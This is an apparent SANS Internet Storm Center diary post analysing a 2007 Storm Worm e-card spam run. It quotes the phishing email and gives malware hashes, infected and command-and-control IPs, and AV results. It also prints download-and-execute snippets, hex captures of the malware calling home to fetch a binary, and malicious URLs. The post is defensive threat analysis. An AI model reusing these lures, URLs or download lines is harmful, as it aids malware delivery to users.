Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Riding out yet Another Storm Wave

Published: 2007-06-28
Last Updated: 2007-06-29 23:14:12 UTC
by Lorna Hutcheson (Version: 2)
0 comment(s)

Sadly you won't need a surf board for this one.  Just to give you a
heads up, there is a new round of emails with malicious links that is
making its way to the inbox of many folks.  If you haven't gotten one
yet, just give it time.   Here is quick summary of what we have found. 

The subject line that we have gotten examples
of have all been identical.  You may have gotten something else.

"Subject: You've received a postcard from a family member!"


The following is an excerpt from the email body.  (WARNING:  Do NOT
FOLLOW THE LINKs below UNLESS YOU KNOW WHAT YOU ARE DOING!!)

--------
OPTION 1
--------

Click on the following Internet address or
copy & paste it into your browser's address box.

http://200.82.187 .228/?08a823e96272575cbc68911e6c36a4

--------
OPTION 2
--------

Copy & paste the ecard number in the "View Your Card" box at
http://200.82.187 .228/

Your ecard number is
08a823e96272575cbc68911e6c36a4



The ecard numbers in the URL above are variable across SPAM samples.

Several additional examples for pattern freaks :):
ee7c634591933434671c16a2e59b1
c3de8293ec6968e3ca03
8517a32e6b9ea6878b15d7703a3b01
7cd64e28cae3d7703a3b01bdad81d9b8
e8293ec6968e3ca036e47840d8e117868911e6
ca9a885b5e6291c3de8293ec6968e3
35601e5ee713076a3db57338
6e47840d8e117868911e6c3

The website has an interesting javascript that appears to have multiple ways to exploit a browser in order to compromise a system.  If javascript is enabled, then you get:

MD5 (tm.exe) = 07276fce39282fd182757d2557f9eca7  which is a downloader that gets this:

MD5 (logi.exe) = 4aa22564a0b886226d8cf14456a598ab

If javascript is disabled, then they provide you a handy link to click on to exploit yourself and you get

MD5 (ecard.exe) = 30051dc10636730e4d6402ef8e88fd04. 

Here is what a user would see:

 "We are currently testing a new browser feature. If you are not able to
view this ecard, please click here (/ecard.exe) to view in its original format."

Here is a listing of just a handful of the 10s to 100s of thousands of
infected home systems.  Every storm infected system is potentially
capable of hosting the malware and sending the SPAM, but only a few will
be used in any given SPAM run depending on how many emails they want
sent and how many web hits they're expecting. You will notice the
Country/Network diversity and the predominance of broadband providers
(data courtesy of Team Cymru)

AS    | IP              | BGP Prefix       | CC | Registry | AS Name
5603  | 194.165.121.126 | 194.165.96.0/19  | SI | ripencc  | SIOL-NET
SiOL Internet
29737 | 24.192.186.35   | 24.192.184.0/21  | US | arin     |
WOW-INTERNET - WideOpenWest
16810 | 67.62.169.71    | 67.62.0.0/16     | US | arin     | CAVTEL02 -
Cavalier Telephone
7132  | 69.219.170.133  | 69.208.0.0/12    | US | arin     | SBIS-AS -
AT&T Internet Svcs/Ameritech
7132  | 70.232.83.200   | 70.224.0.0/11    | US | arin     | SBIS-AS -
AT&T Internet Svcs/SBC Global
3320  | 84.133.236.88   | 84.128.0.0/10    | DE | ripencc  | DTAG
Deutsche Telekom/Dialin.net
12392 | 85.27.49.108    | 85.27.48.0/22    | BE | ripencc  | ASBRUTELE
AS/Brutele SC
21502 | 85.69.86.171    | 85.69.0.0/16     | FR | ripencc  |
ASN-NUMERICABLE/Modulonet.fr
18881 | 201.47.44.156   | 201.47.32.0/19   | BR | lacnic   | Global
Village Telecom
25515 | 213.140.230.102 | 213.140.224.0/19 | RU | ripencc  | CTCNET-AS
Joint-Stock Central Telecom.
8642  | 85.226.199.228  | 85.224.0.0/13    | SE | ripencc  | B2 B2
Bredband/bredbandsbolaget.se


As you can see, detection is skimpy at this point. The key detect below
is "Tibs". (aka Storm/Nuwar/Peacomm/Peed)

Complete scanning result of "ecard.exe", received in VirusTotal at
06.28.2007, 21:24:37 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.6.27.0 06.28.2007  no virus found
AntiVir 7.4.0.34 06.28.2007 HEUR/Crypted
Authentium 4.93.8 06.27.2007  no virus found
Avast 4.7.997.0 06.27.2007  no virus found
AVG 7.5.0.476 06.28.2007  no virus found
BitDefender 7.2 06.28.2007  no virus found
CAT-QuickHeal 9.00 06.27.2007  no virus found
ClamAV devel-20070416 06.28.2007  no virus found
DrWeb 4.33 06.28.2007  no virus found
eSafe 7.0.15.0 06.27.2007 Suspicious Trojan/Worm
eTrust-Vet 30.8.3747 06.28.2007  no virus found
Ewido 4.0 06.27.2007  no virus found
FileAdvisor 1 06.28.2007  no virus found
Fortinet 2.91.0.0 06.28.2007  no virus found
F-Prot 4.3.2.48 06.28.2007  no virus found
F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118
Ikarus T3.1.1.8 06.28.2007  no virus found
Kaspersky 4.0.2.24 06.28.2007  no virus found
McAfee 5062 06.27.2007  no virus found
Microsoft 1.2701 06.28.2007  no virus found
NOD32v2 2360 06.28.2007  no virus found
Norman 5.80.02 06.27.2007 Tibs.gen118
Panda 9.0.0.4 06.28.2007 Suspicious file
Sophos 4.19.0 06.24.2007  no virus found
Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious
Symantec 10 06.28.2007  no virus found
TheHacker 6.1.6.140 06.28.2007  no virus found
VBA32 3.12.0.2 06.27.2007  no virus found
VirusBuster 4.3.23:9 06.27.2007  no virus found
Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted


Aditional Information
File size: 7915 bytes
MD5: 30051dc10636730e4d6402ef8e88fd04
SHA1: 05368309bf89a78d680e239f58ec39bb0f8963b6

 Update1:


If javascript is disabled and a user downloads /ecard.exe (hosted on the IP mentioned in the SPAM) and executes it

ecard.exe connects to 66.148.74.35 on port 80/TCP.
14361 | 66.148.74.35 | 66.148.64.0/19 | US | arin | HOPONE-GLOBAL - HopOne Internet Corporation

Our testing hasn't resulted in a secondary malware download by ecard.exe yet.
However here are two malicious URLs on this IP reported via Castlecops in May
(http://www.castlecops.com/p945429-omega_it_ru.html)

http://66.148.74 .35/aff/dir/sony.exe
http://66.148.74 .35/aff/dir/pdp.exe

Notice the "/aff/dir/" path.

If javascript is enabled a download (from the IP in the SPAM) and execution is attempted
urlRealExe = http://200.82.187 .228/file.php
XMLHttpDownload(v[0], urlRealExe)

If that fails, an exploit routine is started in order to cause the download:
startOverflow(0)

There are 3 exploits available and they are tried in order.
The first one is for QuickTime.
If that fails a Winzip exploit is attempted
If that fails, the "hail mary" is the WebViewFolderIcon exploit.

Assuming the file is downloaded and executed. It calls home to 75.126.21.162 (75.126.21.162-static.reverse.kosmohost.net) on port 80/TCP
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

This IP may look familiar to many. Its been doing its bad thing since at least December, 2006.
And here are a number of domains mapped to this IP that might look familiar
2007postcards.com
jokeonlineworld.com
practicaljokeonline.com
postcardsbargain.com
freewebpostcards.com
mailfreepostcards.com
ecolorpostcards.com

Here's the initial callhome (notice the "/aff/" path)

 TCP Conversation from <infected pc>:1066 to 75.126.21.162:80
Data sent:    
   
4745 5420 2f61 6666 2f63 6e74 722e 7068    GET /aff/cntr.ph
703f 623d 3e40 3e3d 2663 3d37 3937 3626    p?b=>@>=&c=7976&
643d 3132 3220 4854 5450 2f31 2e31 0d0a    d=122 HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                                         .


Here's our encoded reply:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 7465 7874 2f68    ent-Type: text/h
746d 6c0d 0a54 7261 6e73 6665 722d 456e    tml..Transfer-En
636f 6469 6e67 3a20 6368 756e 6b65 640d    coding: chunked.
0a43 6f6e 6e65 6374 696f 6e3a 206b 6565    .Connection: kee
702d 616c 6976 650d 0a58 2d50 6f77 6572    p-alive..X-Power
6564 2d42 793a 2050 4850 2f35 2e32 2e31    ed-By: PHP/5.2.1
0d0a 0d0a 3366 0d0a 3f40 463c 3f41 3e3c    ....3f..?@F<?A><
443e 3c3f 440a 333a 3a35 3537 3933 0a33    D><?D.3::55793.3
0a69 7575 713b 3030 3836 2f32 3337 2f33    .iuuq;0086/237/3
322f 3237 3330 6267 6730 656a 7330 6d70    2/2730bgg0ejs0mp
686a 2f66 7966 0a0d 0a30 0d0a 0d0a         hj/fyf...0....

Here is the PC acting on the command and requesting a file download
(GET /aff/dir/logi.exe)

<infected pc>:1066 to 75.126.21.162:80
Data sent:    

4745 5420 2f61 6666 2f64 6972 2f6c 6f67    GET /aff/dir/log
692e 6578 6520 4854 5450 2f31 2e31 0d0a    i.exe HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                       
                  .

Here come's the new malware binary that will be executed:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 6170 706c 6963    ent-Type: applic
6174 696f 6e2f 6f63 7465 742d 7374 7265    ation/octet-stre
616d 0d0a 436f 6e6e 6563 7469 6f6e 3a20    am..Connection:
6b65 6570 2d61 6c69 7665 0d0a 436f 6e74    keep-alive..Cont
656e 742d 4c65 6e67 7468 3a20 3133 3338    ent-Length: 1338
3637 0d0a 4c61 7374 2d4d 6f64 6966 6965    67..Last-Modifie
643a 2054 6875 2c20 3238 204a 756e 2032    d: Thu, 28 Jun 2
3030 3720 3138 3a30 343a 3435 2047 4d54    007 18:04:45 GMT
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 0d0a 4d5a 9000 0300     bytes....MZ....
0000 0400 0000 ffff 0000 b800 0000 0000    ................
0000 4000 0000 0000 0000 0000 0000 0000    ..@.............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 e000 0000 0e1f ba0e 00b4    ................
09cd 21b8 014c cd21 5468 6973 2070 726f    ..!..L.!This pro
6772 616d 2063 616e 6e6f 7420 6265 2072    gram cannot be r
756e 2069 6e20 444f 5320 6d6f 6465 2e0d    un in DOS mode..


Ok so now they're in business. Here is the peers file Storm needs to get the new zombie bootstrapped into the P2P botnet

C:\WINDOWS\system32\windev-peers.ini

And now we're off to the UDP races with Storm P2P activity flowing over a number of upper random UDP ports as well as a few
more recognizable Storm UDP ports:
7871
16275
11275
11271

And finally, here are a few more of the malware hosting servers they've relied on in recent months in addition to the HopOne and Softlayer host above:

27645 | 205.209.179.15 | 205.209.128.0/18 | US | arin | ASN-NA-MSG-01 - Managed Solutions Group, Inc
27595 | 216.255.189.214 | 216.255.176.0/20 | US | arin | INTERCAGE - InterCage, Inc
14361 | 66.148.74.7 | 66.148.64.0/19 | US | arin | HOPONE-DCA - HopOne Internet Corporation
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc
36351 | 75.126.226.224 | 75.126.0.0/16 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

 

Most excellent analysis provided by Anubis.

SANS ISC Handlers

Keywords:
0 comment(s)
Diary Archives